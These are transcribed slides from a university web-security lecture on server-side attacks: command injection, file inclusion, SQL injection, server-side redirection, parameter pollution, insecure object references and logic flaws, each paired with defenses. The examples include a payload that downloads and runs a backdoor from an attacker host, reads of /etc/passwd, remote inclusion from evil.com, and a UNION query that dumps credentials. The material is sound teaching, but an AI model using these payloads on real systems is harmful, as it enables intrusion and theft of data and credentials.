CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Similar documents
Web Application Security. Philippe Bogaerts

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Application vulnerabilities and defences

Copyright

C1: Define Security Requirements

NET 311 INFORMATION SECURITY

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

John Coggeshall Copyright 2006, Zend Technologies Inc.

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang


Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

OWASP TOP 10. By: Ilia

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Finding Vulnerabilities in Web Applications

Web Application Threats and Remediation. Terry Labach, IST Security Team

CSE 127 Computer Security

Web Application Vulnerabilities: OWASP Top 10 Revisited

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Reflected XSS Cross-Site Request Forgery Other Attacks

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Sichere Software vom Java-Entwickler

Security Course. WebGoat Lab sessions

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Exploiting and Defending: Common Web Application Vulnerabilities

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

1 About Web Security. What is application security? So what can happen? see [?]

Welcome to the OWASP TOP 10

CIS 4360 Secure Computer Systems XSS

Aguascalientes Local Chapter. Kickoff

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

CS 161 Computer Security

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Web Application Security GVSAGE Theater

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Security: Vulnerabilities & Attacks

3. Apache Server Vulnerability Identification and Analysis

IS 2150 / TEL 2810 Introduction to Security

CSCD 303 Essential Computer Security Fall 2017

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Assignment 6: Web Security

Applications Security

Web security: an introduction to attack techniques and defense methods

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

SQL Injection Attack Lab

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Web Security: Web Application Security [continued]

A1 (Part 2): Injection SQL Injection

Client Side Injection on Web Applications

eb Security Software Studio

SECURE CODING ESSENTIALS

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

P2_L12 Web Security Page 1

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Security. CSC309 TA: Sukwon Oh

Web Security. Web Programming.

Solutions Business Manager Web Application Security Assessment

Project 2: Web Security

Test Harness for Web Application Attacks

Information Security. Gabriel Lawrence Director, IT Security UCSD

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

PHP-security Software lifecycle General Security Webserver security PHP security. Security Summary. Server-Side Web Languages

COMP9321 Web Application Engineering

Web Security: Vulnerabilities & Attacks

CSWAE Certified Secure Web Application Engineer

CS 161 Computer Security

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

CS 155 Project 2. Overview & Part A

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Web Penetration Testing

COMP9321 Web Application Engineering

Your Turn to Hack the OWASP Top 10!

CSCE 813 Internet Security Case Study II: XSS

Robust Defenses for Cross-Site Request Forgery Review

Secure Coding, some simple steps help. OWASP EU Tour 2013

Application Layer Security

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

CS 161 Computer Security

Web Security. Attacks on Servers 11/6/2017 1

Web Vulnerabilities. And The People Who Love Them

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Web Application Penetration Testing

EPRI Software Development 2016 Guide for Testing Your Software. Software Quality Assurance (SQA)

SQL Injection. EECS Introduction to Database Management Systems

WebGoat Lab session overview

CSRF in the Modern Age

Transcription:

CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu

Threat model In these scenarios: The server is benign The client is malicious The client can send arbitrary requests to the server, not bound by the HTML interfaces The attacker is after information at the serverside Steal databases Gain access to server Manipulate server-side programs for gain 2

OWASP Top 10 A1 Injection A2 Broken Auth and Session Management A3 Cross-site Scripting A4 Insecure Direct Object References A5 Security misconfiguration A6 Sensitive Data Exposure A7 Missing function level access control A8 Cross-site Request Forgery A9 Using components with kn. vulnerabilities A10 Unvalidated redirects and Forwards 3

OWASP Top 10 A1 Injection A2 Broken Auth and Session Management A3 Cross-site Scripting A4 Insecure Direct Object References A5 Security misconfiguration A6 Sensitive Data Exposure A7 Missing function level access control A8 Cross-site Request Forgery A9 Using components with kn. vulnerabilities A10 Unvalidated redirects and Forwards 4

Imagine a server-side calendar <?php $year = $_GET[ year ]; print <pre> ; system( cal $year ); print </pre> ;?> 5

http://example.com/cal.php?year=2017 system( cal 2017 ); 6

http://example.com/cal.php?year=2017;cat /etc/passwd system( cal 2017; cat /etc/passwd ); What if we, as the script programmers, blacklist the semicolon? Will it solve our problems? 7

http://example.com/cal.php?year=2017%26%26cat /etc/passwd system( cal 2017 && cat /etc/passwd ); 8

http://example.com/cal.php?year=2017 %2626wget www.attacker.com/backdoor.sh O/tmp/back.sh%2626chmod +x /tmp/back.sh%26%26/tmp/back.sh Injected commands does the following: Downloads backdoor script from attacker s server Makes it executable Executes it Backdoor is now running with the permissions of the web server user on the web server 9

Remote Command Execution These were examples of a vulnerability belonging to the class of Remote Command Execution One of the more deadly attacks Attacker has foothold on server This foothold can be used to (among others): steal data, connect to other machines internal to the network, or try to become root 10

Defenses Defense should not be blacklisting Hard to do comprehensively (&,*,`,$,( ) Problems with applications that need access to the things that you blacklist Sanitization is the correct step We saw this again in XSS where we said that the characters needed to be properly escaped E.g. Place parameters in single quotes and escape existing single quotes that are part of the payload Frameworks provide functions to help, e.g., escapeshellarg() in PHP 11

Question Can we rely on sanitization of the arguments using JavaScript at the client-side? E.g. use JavaScript to add quotes to the value of the year variable, as the attacker types it in a specific HTML input field NO!!!!!! The attacker is the client, and can send arbitrary input to us (e.g. remove JavaScript, or just create requests by hand/through another program) 12

Down the rabbit hole <?php $file = $_GET['f']; if(isset($file)) { include("pages/$file"); } else { include("index.php"); }?> 13

Local File Inclusion Intended use: http://example.com/index.php?f=contactus.php Unintended use: http://example.com/index.php?f=../../../../../etc/pas swd So now an attacker can read text files located on the system which are readable by the web server process 14

Down the rabbit hole <?php $file = $_GET['f']; if(isset($file)) { include($file..php ); } else { include("index.php"); }?> 15

Remote File Inclusion Intended use: http://example.com/index.php?f=contactus Unintended use: http://example.com/index.php?f=http://evil.com/co mmands So now an attacker can also run arbitrary PHP commands on the server 16

Defenses Filter input Good but must account for more exotic attacks (e.g. different encodings of dots and slashes) Use known white list Much better but involves more work E.g. file can be one of [ news, contactus, main ] If the request matches, great. If not, drop it. 17

OWASP Top 10 A1 Injection A2 Broken Auth and Session Management A3 Cross-site Scripting A4 Insecure Direct Object References A5 Security misconfiguration A6 Sensitive Data Exposure A7 Missing function level access control A8 Cross-site Request Forgery A9 Using components with kn. vulnerabilities A10 Unvalidated redirects and Forwards 18

Different name, same beast <?php $user = $_POST[ username ]; $pass = $_POST[ password ]; $res = mysql_query( SELECT * from members where username = $user and password = pass ); [ ]?> 19

Different name, same beast If the user submits: Username: Jack Password: letmein Then the query becomes SELECT * from members where username = Jack and password = letmein 20

SQL Injection What if an attacker submits: Username: administrator -- Password: doesnotmatter Then the query becomes SELECT * from members where username = administrator -- and password = doesnotmatter Comment operator for some SQL databases 21

SQL Injection In an online with the following link: http://www.buystuff.com/products?pid=123 The SQL query happening at the server may look like this: SELECT * from products where pid = $_GET[ pid ] An attacker could construct the following input: pid= -9999 UNION ALL SELECT username,password,3,4,5 from members; Allowing him to list credentials from different tables in the SQL database 22

Compulsory XKCD cartoon http://xkcd.com/327/ 23

Defenses As before, sanitization should be used to stop the attack E.g. knowing that a value should only be an integer, allows you to wrap it in the intval() function More generically, for SQL, prepared statements are considered the best way of defending 24

Prepared statements mysql_query( SELECT * from members where username = $user and password = `$pass ); Now becomes $stmt = $conn->prepare("select * from members where username=? and password=?"); $stmt->bind_param("ss", username,password); $stmt->execute(); $res = $stmt->get_result(); 25

OWASP Top 10 A1 Injection A2 Broken Auth and Session Management A3 Cross-site Scripting A4 Insecure Direct Object References A5 Security misconfiguration A6 Sensitive Data Exposure A7 Missing function level access control A8 Cross-site Request Forgery A9 Using components with kn. vulnerabilities A10 Unvalidated redirects and Forwards 26

Injection (still) Web servers, in addition to sending SQL requests to internal SQL servers can also send HTTP requests to internal (or external) servers If these requests contain user-controlled input, an attacker could trick the server to: Send requests to arbitrary internal/external servers (Server-side redirection) Overwrite existing parameters in those internal requests (HTTP Parameter Pollution) 27

Injection (Server-side Redirection) In a server-side redirection attack, attackers are able to specify an arbitrary resource or URL that is then requested by the front-end web application POST /account/home HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: vulnerable.com Content-length: 65 view=default&loc=online.foo.net/css/style.css 28

Injection (Server-side Redirection) In a server-side redirection attack, attackers are able to specify an arbitrary resource or URL that is then requested by the front-end web application POST /account/home HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: vulnerable.com Content-length: 65 view=default&loc=online.foo.net/css/style.css 29

Injection (Server-side Redirection) In a server-side redirection attack, attackers are able to specify an arbitrary resource or URL that is then requested by the front-end web application POST /account/home HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: vulnerable.com Content-length: 65 view=default&loc=192.168.0.1:22 30

Injection (HTTP Parameter Pollution) HTTP Parameter Injection (HPI) can occur when user-supplied parameters are used as parameters in new HTTP requests towards backends These requests are done by the web server (not by the user/attacker) The goal is to confuse the backend webserver and get it to use the parameter controlled by the attacker instead of the one sent by the application 31

Injection (HTTP Parameter Pollution) The reason why HPI exists is because the HTTP specification is not explicit about what servers should do when they receive a request having two parameters with the same name http://www.example.com?foo=1&bar=yes&foo=2 At the server-side, what should the value of the foo variable be? 1, 2, 12, [1,2]? It turns out that different combinations of web server/server-side languages do different things 32

Injection (HTTP Parameter Pollution) Depending on the configuration, an attacker may be able to override the value specified in the backend HTTP request 33

Injection (HTTP Parameter Pollution) 1 Attacker to public-facing webserver POST /bank/52/default.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: acmebank.com Content-length: 65 fromacc=123456&amount=1000&toacc=654321&submit=submit Public-facing webserver to internal webserver 2 POST /dotransfer.asp HTTP/1.1 Host: internal.acmebank.com Content-length: 72 FROM=123456&clearedfunds=false&AMOUNT=1000&TO=654321 34

Injection (HTTP Parameter Pollution) 1 Attacker to public-facing webserver POST /bank/52/default.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: acmebank.com Content-length: 65 fromacc=123456%26clearedfunds=true&amount=1000&toacc=654321&submit=s ubmit Public-facing webserver to internal webserver 2 POST /dotransfer.asp HTTP/1.1 Host: internal.acmebank.com Content-length: 72 FROM=123456&clearedfunds=true&clearedfunds=false&AMOUNT=1000&TO=654 321 35

OWASP Top 10 A1 Injection A2 Broken Auth and Session Management A3 Cross-site Scripting A4 Insecure Direct Object References A5 Security misconfiguration A6 Sensitive Data Exposure A7 Missing function level access control A8 Cross-site Request Forgery A9 Using components with kn. vulnerabilities A10 Unvalidated redirects and Forwards 36

Insecure Direct Object References Imagine you login to your bank account, and there s a link that allows you to see last month s statement: http://bank.com/get_last_statement.php?u=97665 In insecure direct object reference, the application exposes a direct reference to an object which can allow attacker to bypass authorization, e.g., http://bank.com/get_last_statement.php?u=976654 http://bank.com/get_last_statement.php?u=976653 http://bank.com/get_last_statement.php?u=976652 37

Recent example October 2017 38

Defenses Wrap direct object references into sessionspecific aliases $_SESSION[ refs ] = array ( 1 => 2109, 2 => 2189, ); De-reference the user-provided values through this table 39

HTTP Parameter Tampering Vulnerabilities In all of these attacks, it s important to remember that the client is the attacker, and the server is the potential victim In HTTP Parameter tampering, an attacker can arbitrarily change the values of parameters that are exposed to him E.g. prices of products, current auth level, etc. 40

41

Logic Vulnerabilities HTTP parameter tampering vulnerabilities are a subset of logic vulnerabilities in web applications Logic vulnerabilities typically rely on breaking assumptions made by architects and developers Assumptions Step 2 can only be performed after Step 1 The web application controls the navigation steps Users cannot change parameters that they cannot see Etc. 42

Examples of logic vulnerabilities Unlike XSS, SQL Injection, etc. logic vulnerabilities do not have set signatures This makes them hard to identify, especially by automated vulnerability discovery tools We will see a few real-world examples based on the book The Web Application Hackers Handbook 43

Case Study: Password change A website allows its users to change their password, by filling out a form with their current password, and their new password Administrators can also change a user s password but they don t need to provide a user s current password 44

Case Study: Password change The code that handles these two cases is the same and the developer assumes that if the existingpassword parameter is not present, this must be because the current request came from an administrative UI All the attackers has to do is drop the existingpassword HTTP parameter from the outgoing request 45

Case Study: Business Limit A business does not want its finance personnel to be able to transfer funds between accounts that exceed a certain threshold, without approval 46

Case Study: Business Limit The code allows negative transfers from A to B which the transaction module interprets as a positive transfer from B to A Therefore a malicious employee (or an attacker who has stolen his credentials) can initiate a transfer for say -$20,000 and bypass the transfer limit 47

Case Study: Bulk Discounts An online shop gives users discounts when they buy some products together E.g. If you purchase an antivirus solution, and a personal firewall, and antispam software then you are entitled to 25% discount on each product Abuse Add all products in your basket to get the discount and then remove the ones you don t want 48

Case Study: Escaping from escaping A web application has to pass user-controllable input as an argument to an operating system command. The developer creates a list of special shell metacharacters that need escaping ; & < > space and newline If any of these are present in the input, the code escapes them by prepending them with a backslash \ 49

Case Study: Escaping from escaping If an attacker types foo;ls The code converts it to foo\;ls What if an attacker types an escape character foo\;ls Will become foo\\;ls Which amounts to escaping the backslash but not the semicolon 50

Case Study: Invalidating input validation A web application has two filtering mechanisms aimed at stopping abuse Filter 1: Escape single quotes with an additional quote as a means of invalidating SQL injections admin becomes admin-- Filter 2: Prune all user inputs to 128 characters Abuse Submit 128 character SQL injection with the last character being a single quote Filter 1 will escape the single quote by adding another quote, thereby making the string 129 bytes long Filter 2 will prune the string to 128 bytes and remove the extra escaping quote, making the SQL injection valid again 51

Defenses Do not rely on anything that the client-sends Double check all values and rely on clean server-side copies This goes for control-data (e.g. is the user an admin) as well as non-control data (how much does product x cost) Do not assume a navigation order Once again, making checks through JavaScript is okay but these checks should be replicated at the server side E.g. are the quantities > 0, fetching the prices from the server-side DB, etc. 52

Questions? 53

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback